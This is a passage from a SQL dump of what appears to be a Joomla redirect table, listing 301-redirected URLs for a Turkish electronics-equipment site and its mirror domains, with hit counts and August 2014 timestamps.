00:00:00',301),(3141,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',5,0,'2014-08-16 09:46:03','0000-00-00 00:00:00',301),(3142,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',6,0,'2014-08-16 09:50:45','0000-00-00 00:00:00',301),(3143,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',9,0,'2014-08-16 09:52:31','0000-00-00 00:00:00',301),(3144,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',5,0,'2014-08-16 10:01:26','0000-00-00 00:00:00',301),(3145,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',4,0,'2014-08-16 10:14:05','0000-00-00 00:00:00',301),(3146,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',12,0,'2014-08-16 10:14:50','0000-00-00 00:00:00',301),(3147,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',2,0,'2014-08-16 10:40:37','0000-00-00 00:00:00',301),(3148,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',1,0,'2014-08-16 10:41:24','0000-00-00 00:00:00',301),(3149,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',1,0,'2014-08-16 10:59:46','0000-00-00 00:00:00',301),(3150,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',2,0,'2014-08-16 11:01:26','0000-00-00 00:00:00',301),(3151,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',2,0,'2014-08-16 11:04:30','0000-00-00 00:00:00',301),(3152,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',2,0,'2014-08-16 11:09:42','0000-00-00 00:00:00',301),(3153,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',9,0,'2014-08-16 11:33:41','0000-00-00 00:00:00',301),(3154,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',3,0,'2014-08-16 11:34:35','0000-00-00 00:00:00',301),(3155,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',4,0,'2014-08-16 11:46:11','0000-00-00 00:00:00',301),(3156,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',3,0,'2014-08-16 11:46:29','0000-00-00 00:00:00',301),(3157,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',13,0,'2014-08-16 11:53:44','0000-00-00 00:00:00',301),(3158,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',7,0,'2014-08-16 11:54:37','0000-00-00 00:00:00',301),(3159,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',10,0,'2014-08-16 12:16:51','0000-00-00 00:00:00',301),(3160,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',10,0,'2014-08-16 12:16:58','0000-00-00 00:00:00',301),(3161,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',10,0,'2014-08-16 12:17:08','0000-00-00 00:00:00',301),(3162,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',10,0,'2014-08-16 12:17:14','0000-00-00 00:00:00',301),(3163,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',10,0,'2014-08-16 12:17:49','0000-00-00 00:00:00',301),(3164,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',10,0,'2014-08-16 12:18:03','0000-00-00 00:00:00',301),(3165,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',10,0,'2014-08-16 12:18:22','0000-00-00 00:00:00',301),(3166,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',10,0,'2014-08-16 12:18:29','0000-00-00 00:00:00',301),(3167,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',10,0,'2014-08-16 12:18:39','0000-00-00 00:00:00',301),(3168,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',11,0,'2014-08-16 12:18:44','0000-00-00 00:00:00',301),(3169,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',11,0,'2014-08-16 12:18:53','0000-00-00 00:00:00',301),(3170,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',10,0,'2014-08-16 12:19:02','0000-00-00 00:00:00',301),(3171,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',10,0,'2014-08-16 12:19:11','0000-00-00 00:00:00',301),(3172,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',11,0,'2014-08-16 12:19:17','0000-00-00 00:00:00',301),(3173,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',10,0,'2014-08-16 12:19:24','0000-00-00 00:00:00',301),(3174,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',10,0,'2014-08-16 12:19:32','0000-00-00 00:00:00',301),(3175,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',11,0,'2014-08-16 12:19:36','0000-00-00 00:00:00',301),(3176,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',10,0,'2014-08-16 12:19:43','0000-00-00 00:00:00',301),(3177,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',11,0,'2014-08-16 12:19:49','0000-00-00 00:00:00',301),(3178,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',10,0,'2014-08-16 12:19:56','0000-00-00 00:00:00',301),(3179,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',10,0,'2014-08-16 12:20:02','0000-00-00 00:00:00',301),(3180,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',7,0,'2014-08-16 12:20:31','0000-00-00 00:00:00',301),(3181,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',4,0,'2014-08-16 12:52:04','0000-00-00 00:00:00',301),(3182,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',5,0,'2014-08-16 13:04:31','0000-00-00 00:00:00',301),(3183,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',3,0,'2014-08-16 13:18:58','0000-00-00 00:00:00',301),(3184,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',2,0,'2014-08-16 13:31:33','0000-00-00 00:00:00',301),(3185,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',4,0,'2014-08-16 13:40:13','0000-00-00 00:00:00',301),(3186,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117','','','',7,0,'2014-08-16 14:00:31','0000-00-00 00:00:00',301),(3187,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',4,0,'2014-08-16 14:06:24','0000-00-00 00:00:00',301),(3188,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',3,0,'2014-08-16 14:18:53','0000-00-00 00:00:00',301),(3189,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',1,0,'2014-08-16 14:20:36','0000-00-00 00:00:00',301),(3190,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',17,0,'2014-08-16 14:20:47','0000-00-00 00:00:00',301),(3191,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',2,0,'2014-08-16 14:21:19','0000-00-00 00:00:00',301),(3192,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',2,0,'2014-08-16 14:22:30','0000-00-00 00:00:00',301),(3193,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',1,0,'2014-08-16 14:34:07','0000-00-00 00:00:00',301),(3194,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',10,0,'2014-08-16 14:36:39','0000-00-00 00:00:00',301),(3195,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',1,0,'2014-08-16 14:55:46','0000-00-00 00:00:00',301),(3196,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default','','','',3,0,'2014-08-16 15:01:41','0000-00-00 00:00:00',301),(3197,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',17,0,'2014-08-16 15:06:30','0000-00-00 00:00:00',301),(3198,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',5,0,'2014-08-16 15:08:26','0000-00-00 00:00:00',301),(3199,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',13,0,'2014-08-16 15:09:57','0000-00-00 00:00:00',301),(3200,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',3,0,'2014-08-16 15:10:56','0000-00-00 00:00:00',301),(3201,'http://www.3s-technologies.com.tr/index.php/tr/�ǡ?o=3&g=&s=&z=���������ӂ?','','http://www.3s-technologies.com.tr/index.php/tr/?gclid=COetgbOJmMACFSEcwwodvhUA0A','',1,0,'2014-08-16 15:14:03','0000-00-00 00:00:00',301),(3202,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',3,0,'2014-08-16 16:01:45','0000-00-00 00:00:00',301),(3203,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',11,0,'2014-08-16 16:08:41','0000-00-00 00:00:00',301),(3204,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',1,0,'2014-08-16 16:16:41','0000-00-00 00:00:00',301),(3205,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',2,0,'2014-08-16 16:25:39','0000-00-00 00:00:00',301),(3206,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',3,0,'2014-08-16 16:31:58','0000-00-00 00:00:00',301),(3207,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',5,0,'2014-08-16 16:34:45','0000-00-00 00:00:00',301),(3208,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',2,0,'2014-08-16 16:42:20','0000-00-00 00:00:00',301),(3209,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=125&Itemid=131','','','',25,0,'2014-08-16 16:43:48','0000-00-00 00:00:00',301),(3210,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',24,0,'2014-08-16 16:43:52','0000-00-00 00:00:00',301),(3211,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=127&Itemid=134','','','',34,0,'2014-08-16 16:43:56','0000-00-00 00:00:00',301),(3212,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136&Itemid=138','','','',51,0,'2014-08-16 16:44:00','0000-00-00 00:00:00',301),(3213,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',19,0,'2014-08-16 16:44:04','0000-00-00 00:00:00',301),(3214,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=82&Itemid=38','','','',26,0,'2014-08-16 16:44:57','0000-00-00 00:00:00',301),(3215,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36&Itemid=37','','','',33,0,'2014-08-16 16:45:00','0000-00-00 00:00:00',301),(3216,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',4,0,'2014-08-16 16:51:57','0000-00-00 00:00:00',301),(3217,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',7,0,'2014-08-16 16:53:50','0000-00-00 00:00:00',301),(3218,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',8,0,'2014-08-16 17:10:59','0000-00-00 00:00:00',301),(3219,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',1,0,'2014-08-16 17:11:25','0000-00-00 00:00:00',301),(3220,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',2,0,'2014-08-16 17:12:17','0000-00-00 00:00:00',301),(3221,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',8,0,'2014-08-16 17:23:31','0000-00-00 00:00:00',301),(3222,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',2,0,'2014-08-16 17:24:27','0000-00-00 00:00:00',301),(3223,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',3,0,'2014-08-16 17:31:45','0000-00-00 00:00:00',301),(3224,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',13,0,'2014-08-16 17:36:01','0000-00-00 00:00:00',301),(3225,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',2,0,'2014-08-16 17:51:04','0000-00-00 00:00:00',301),(3226,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',4,0,'2014-08-16 17:53:33','0000-00-00 00:00:00',301),(3227,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',1,0,'2014-08-16 17:57:21','0000-00-00 00:00:00',301),(3228,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',6,0,'2014-08-16 18:00:46','0000-00-00 00:00:00',301),(3229,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',7,0,'2014-08-16 18:05:07','0000-00-00 00:00:00',301),(3230,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',9,0,'2014-08-16 18:17:56','0000-00-00 00:00:00',301),(3231,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',2,0,'2014-08-16 18:33:24','0000-00-00 00:00:00',301),(3232,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',2,0,'2014-08-16 18:33:30','0000-00-00 00:00:00',301),(3233,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',9,0,'2014-08-16 18:36:21','0000-00-00 00:00:00',301),(3234,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',3,0,'2014-08-16 18:42:24','0000-00-00 00:00:00',301),(3235,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',2,0,'2014-08-16 18:47:07','0000-00-00 00:00:00',301),(3236,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',2,0,'2014-08-16 18:48:01','0000-00-00 00:00:00',301),(3237,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',1,0,'2014-08-16 18:56:12','0000-00-00 00:00:00',301),(3238,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',2,0,'2014-08-16 19:08:07','0000-00-00 00:00:00',301),(3239,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',1,0,'2014-08-16 19:24:13','0000-00-00 00:00:00',301),(3240,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',1,0,'2014-08-16 19:31:54','0000-00-00 00:00:00',301),(3241,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',4,0,'2014-08-16 19:33:18','0000-00-00 00:00:00',301),(3242,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',4,0,'2014-08-16 19:33:33','0000-00-00 00:00:00',301),(3243,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',3,0,'2014-08-16 19:38:56','0000-00-00 00:00:00',301),(3244,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',3,0,'2014-08-16 19:40:37','0000-00-00 00:00:00',301),(3245,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',3,0,'2014-08-16 19:45:48','0000-00-00 00:00:00',301),(3246,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',4,0,'2014-08-16 20:07:07','0000-00-00 00:00:00',301),(3247,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=93&Itemid=104','','','',23,0,'2014-08-16 20:13:00','0000-00-00 00:00:00',301),(3248,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',3,0,'2014-08-16 20:29:25','0000-00-00 00:00:00',301),(3249,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=0&lang=tr','','','',1,0,'2014-08-16 20:31:15','0000-00-00 00:00:00',301),(3250,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',4,0,'2014-08-16 20:39:31','0000-00-00 00:00:00',301),(3251,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',3,0,'2014-08-16 20:46:52','0000-00-00 00:00:00',301),(3252,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',12,0,'2014-08-16 20:50:36','0000-00-00 00:00:00',301),(3253,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',11,0,'2014-08-16 20:53:43','0000-00-00 00:00:00',301),(3254,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',6,0,'2014-08-16 20:54:20','0000-00-00 00:00:00',301),(3255,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',6,0,'2014-08-16 20:56:48','0000-00-00 00:00:00',301),(3256,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',2,0,'2014-08-16 21:03:04','0000-00-00 00:00:00',301),(3257,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',91,0,'2014-08-16 21:05:33','0000-00-00 00:00:00',301),(3258,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',4,0,'2014-08-16 21:08:08','0000-00-00 00:00:00',301),(3259,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',3,0,'2014-08-16 21:09:48','0000-00-00 00:00:00',301),(3260,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',4,0,'2014-08-16 21:11:10','0000-00-00 00:00:00',301),(3261,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',3,0,'2014-08-16 21:16:46','0000-00-00 00:00:00',301),(3262,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',3,0,'2014-08-16 21:20:34','0000-00-00 00:00:00',301),(3263,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',4,0,'2014-08-16 21:22:23','0000-00-00 00:00:00',301),(3264,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',6,0,'2014-08-16 21:29:14','0000-00-00 00:00:00',301),(3265,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',4,0,'2014-08-16 21:34:15','0000-00-00 00:00:00',301),(3266,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',3,0,'2014-08-16 21:36:57','0000-00-00 00:00:00',301),(3267,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',13,0,'2014-08-16 21:37:11','0000-00-00 00:00:00',301),(3268,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',3,0,'2014-08-16 21:44:48','0000-00-00 00:00:00',301),(3269,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',143,0,'2014-08-16 21:46:04','0000-00-00 00:00:00',301),(3270,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',3,0,'2014-08-16 21:47:55','0000-00-00 00:00:00',301),(3271,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',6,0,'2014-08-16 21:49:45','0000-00-00 00:00:00',301),(3272,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',6,0,'2014-08-16 22:11:36','0000-00-00 00:00:00',301),(3273,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',6,0,'2014-08-16 22:19:04','0000-00-00 00:00:00',301),(3274,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',4,0,'2014-08-16 22:24:04','0000-00-00 00:00:00',301),(3275,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',4,0,'2014-08-16 23:19:13','0000-00-00 00:00:00',301),(3276,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',3,0,'2014-08-16 23:19:19','0000-00-00 00:00:00',301),(3277,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',3,0,'2014-08-16 23:27:24','0000-00-00 00:00:00',301),(3278,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',7,0,'2014-08-16 23:33:36','0000-00-00 00:00:00',301),(3279,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',4,0,'2014-08-16 23:57:12','0000-00-00 